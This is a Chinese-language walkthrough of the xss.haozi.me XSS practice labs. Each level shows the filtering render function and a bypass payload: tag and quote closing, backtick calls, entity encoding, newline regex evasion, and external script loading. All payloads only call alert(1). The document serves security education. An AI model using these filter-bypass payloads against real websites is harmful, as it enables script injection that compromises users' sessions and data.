Web安全基础 - XSS Labs
实验来自于https://xss.haozi.me
XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
XSS攻击实际上就是攻击者使得浏览器执行本不该存在的前端代码。
0x00 基础
服务端代码如下:
function render (input) {
return '<div>' + input + '</div>'
}
当输入为<scirpt>alert(1);</scirpt>,因为输入要回显到前端,这时候浏览器将输入识别为了HTML代码,执行alert(1);
0x01-0x02 主动闭合
0x01 主动闭合-标签
服务端代码如下:
function render (input) {
return '<textarea>' + input + '</textarea>'
}
textarea会将输入作为多行文本显示出来,我们想继续让输入作为代码执行,就要主动闭合来绕过该标签,
那么输入就是</textarea><script>alert(1);</script><textarea>
可以看到页面前端多了两个空的文本框,它们是由我们的输入主动闭合造成的。出现引号等将输入识别为文本的限制,也可以使用这种方法绕过。如下题。
0x02 主动闭合-引号
该题目的服务端代码:
function render (input) {
return '<input type="name" value="' + input + '">'
}
当我们输入"><script>alert(1);</script><"时候引号闭合,html为
<input type="name" value=""><script>alert(1);</script><"">
name的值为空,输入作为了脚本执行。
0x03-0x05 常见过滤
0x03 ()过滤
服务端代码将()过滤,但我们执行函数时需要带上()。
function render (input) {
const stripBracketsRe = /[()]/g
input = input.replace(stripBracketsRe, '')
return input
}
通过键盘左上角的``可以绕过()的过滤,输入
<script>alert`1`;</script>
成功绕过
0x04 ()&`过滤
服务端同时过滤了()和`
function render (input) {
const stripBracketsRe = /[()`]/g
input = input.replace(stripBracketsRe, '')
return input
}
这里要用到HTML实体字符来绕过,(, )分别代表左右括号
这里直接输入<script>alert(1)</script>不行,因为script标签内部会识别成js代码而非html语言。
这里使用<img src="asdasd" onerror="alert(1);">
img的src任意填写,保证其失败后调用onerror属性内的代码。
0x05 -->过滤
服务端代码过滤掉了-->
function render (input) {
input = input.replace(/-->/g, '😂')
return '<!-- ' + input + ' -->'
}
使用--!>绕过即可
输入--!><script>alert(1);</script>
0x06-0x07 正则绕过
0x06 正则绕过-换行1
服务端过滤了正则:auto|on.*=|>
function render (input) {
input = input.replace(/auto|on.*=|>/ig, '_')
return `<input value=1 ${input} type="text">`
}
这里在input标签内构造标签属性image,然后模仿上题构造onerror的语句,注意onerror后面要另加换行,不然会被正则过滤
type="image" src="sdsa" onerror
="alert(1);"
0x07 正则绕过-标签不闭合
服务器过滤正则/<\/?[^>]+>/gi
function render (input) {
const stripTagsRe = /<\/?[^>]+>/gi
input = input.replace(stripTagsRe, '')
return `<article>${input}</article>`
}
这个正则匹配以<或者</开头,至少有一个非>字符作为内容,以>结尾的字符串
输入<img src="sad" onerror="alert(1);"不闭合就可以绕过
0x08 正则绕过-换行2
服务器过滤了标签导致无法闭合
function render (src) {
src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
return `
<style>
${src}
</style>
`
}
输入
</style
>
<script>alert(1);</script>
绕过
0x09 正则绕过-test检测
test只会检测是否存在要求的正则匹配
function render (input) {
let domainRe = /^https?:\/\/www\.segmentfault\.com/
if (domainRe.test(input)) {
return `<script src="${input}"></script>`
}
return 'Invalid URL'
}
我们只要首先输入对应的URL再闭合,重新开始构造就好,这里不能使用script,因为后面还有一个引号
https://www.segmentfault.com"></script><img src="123" onerror="alert(1);
0x0A 引入漏洞页面
这里综合了replace和test,先进行URL的检测,再进行字符的替换
function render (input) {
function escapeHtml(s) {
return s.replace(/&/g, '&')
.replace(/'/g, ''')
.replace(/"/g, '"')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/\//g, '/')
}
const domainRe = /^https?:\/\/www\.segmentfault\.com/
if (domainRe.test(input)) {
return `<script src="${escapeHtml(input)}"></script>`
}
return 'Invalid URL'
}
仔细看代码发现是将原字符替换为对应的HTML字符实体,但是输入最后在script里面识别为js代码。
这里利用的是src属性会将@后的网址解析出来,将前面的内容作为用户名作为登录后面网页的用户名
(alert(1)的js官方提供地址:https://xss.haozi.me/j.js)
放个别人的payloadhttps://www.segmentfault.com@xss.haozi.me/j.js,但是我在Chrome和edge上都没有成功。
0x0B-0x0C toUpperCase
0x0B toUpperCase
这关会将所有的输入转换为大写字符,我们根据之前的思路,利用HTML实体字符来绕过。
function render (input) {
input = input.toUpperCase()
return `<h1>${input}</h1>`
}
标签是大小写不敏感的,但是我们要执行的js代码大小写敏感,对代码进行实体字符编码
alert(1); "alert(1);"
0x0C 标签过滤+toUpperCase
在toUpperCase前加了一次script的过滤,用上一题的payload依然可以解
function render (input) {
input = input.replace(/script/ig, '')
input = input.toUpperCase()
return '<h1>' + input + '</h1>'
}
0x0D 注释逃逸
首先对input进行一些过滤所以//这里就不能用了,使用-->来过滤,然后是通过换行来绕过注释
function render (input) {
input = input.replace(/[</"']/g, '')
return `
<script>
// alert('${input}')
</script>
`
}
我们的输入就应该是%0Aalert(1)%3B%0A--%3E
alert(1);
-->
0x0E ſ绕过
这里的语法是在<和紧邻的第一个字母前面加上_
function render (input) {
input = input.replace(/<([a-zA-Z])/g, '<_$1')
input = input.toUpperCase()
return '<h1>' + input + '</h1>'
}
做出来的人payload是这样的<ſcript src="https://xss.haozi.me/j.js"></script>
- ſ 是古英语中的s的写法, 转成大写是正常的S
- 利用src引入漏洞文件来绕过大写JS代码无法执行
0x0F-0x12 主动闭合2
0x0F 主动闭合-调用
function render (input) {
function escapeHtml(s) {
return s.replace(/&/g, '&')
.replace(/'/g, ''')
.replace(/"/g, '"')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/\//g, '/')
}
return `<img src onerror="console.error('${escapeHtml(input)}')">`
}
<script src="${escapeHtml(input)}"></script>这是0x0A的HTML实体字符替换,成功阻止了我们进行截断。
虽然该题也进行了实体字符替换,但是对于内联为字符串的js代码,浏览器会先进行HTML解析,再将其视作js,因此我们这里可以直接截断绕过。
Payload:');alert('1
0x10 主动闭合-语句
function render (input) {
return `
<script>
window.data = ${input}
</script>
`
}
和上一题类似,闭合再写入alert语句就好
Payload: 1;alert(1)
0x11 主动闭合-综合
应该是这些题目里最长的代码,不过意思也很简明。
这里的escapeJs的作用是将一些特殊字符转义为普通字符。script是给页面添加一个url并点击,也就是触发我们的输入。
看明白了其实还是用到闭合的思路。
// from alf.nu
function render (s) {
function escapeJs (s) {
return String(s)
.replace(/\\/g, '\\\\')
.replace(/'/g, '\\\'')
.replace(/"/g, '\\"')
.replace(/`/g, '\\`')
.replace(/</g, '\\74')
.replace(/>/g, '\\76')
.replace(/\//g, '\\/')
.replace(/\n/g, '\\n')
.replace(/\r/g, '\\r')
.replace(/\t/g, '\\t')
.replace(/\f/g, '\\f')
.replace(/\v/g, '\\v')
// .replace(/\b/g, '\\b')
.replace(/\0/g, '\\0')
}
s = escapeJs(s)
return `
<script>
var url = 'javascript:console.log("${s}")'
var a = document.createElement('a')
a.href = url
document.body.appendChild(a)
a.click()
</script>
`
}
Payload: ");alert(1);("
0x12 主动闭合-综合2
“替换成\“,可以双写一个\来转义掉第一个\绕过
console.log("")有语法错误,要再加一个\来转义
function escape (s) {
s = s.replace(/"/g, '\\"')
return '<script>console.log("' + s + '");</script>'
}
Payload:\");alert(1);//